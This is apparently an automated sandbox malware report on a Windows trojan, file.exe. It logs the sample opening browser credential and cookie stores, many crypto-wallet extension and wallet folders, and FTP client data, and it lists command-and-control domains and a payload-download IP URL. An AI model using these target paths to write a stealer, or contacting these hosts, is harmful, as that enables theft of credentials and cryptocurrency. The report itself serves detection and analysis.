              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 1600, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2317895828.0000000001283000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 1600, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 1600, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              12
              Process Injection
              34
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              1
              Query Registry
              Remote Services31
              Data from Local System
              1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              12
              Process Injection
              LSASS Memory741
              Security Software Discovery
              Remote Desktop ProtocolData from Removable Media11
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell
              Logon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information
              Security Account Manager34
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information
              NTDS2
              Process Discovery
              Distributed Component Object ModelInput Capture114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing
              LSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials223
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe47%ReversingLabsWin32.Trojan.Symmi
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://go.m0%Avira URL Cloudsafe
              https://cook-rain.sbs/apiD100%Avira URL Cloudmalware
              http://go.microsoft.co0%Avira URL Cloudsafe
              http://185.215.113.16/steam/random.exeNn100%Avira URL Cloudphishing
              https://cook-rain.sbs/zSUu%100%Avira URL Cloudmalware
              https://cook-rain.sbs/38e100%Avira URL Cloudmalware
              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484490%Avira URL Cloudsafe
              https://cook-rain.sbs/apiY100%Avira URL Cloudmalware
              https://cook-rain.sbs/apiz/100%Avira URL Cloudmalware
              https://cook-rain.sbs/$100%Avira URL Cloudmalware
              http://185.215.113.16/off/def.exe1100%Avira URL Cloudphishing
              https://cook-rain.sbs/apiD8%VirustotalBrowse
              https://cook-rain.sbs/cg/m5V100%Avira URL Cloudmalware
              http://185.215.113.16/&100%Avira URL Cloudphishing
              NameIPActiveMaliciousAntivirus DetectionReputation
              cook-rain.sbs
              188.114.97.3
              truefalse
                high
                s-part-0017.t-0009.t-msedge.net
                13.107.246.45
                truefalse
                  high
                  www.google.com
                  216.58.206.68
                  truefalse
                    high
                    js.monitor.azure.com
                    unknown
                    unknownfalse
                      high
                      mdec.nelreports.net
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        peepburry828.sbsfalse
                          high
                          p10tgrace.sbsfalse
                            high
                            processhol.sbsfalse
                              high
                              https://cook-rain.sbs/apifalse
                                high
                                https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.jsfalse
                                  high
                                  p3ar11fter.sbsfalse
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cfchromecache_105.7.drfalse
                                      high
                                      https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2238542196.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238779015.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238617063.0000000005B29000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2238542196.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238779015.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238617063.0000000005B29000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/chromecache_105.7.drfalse
                                            high
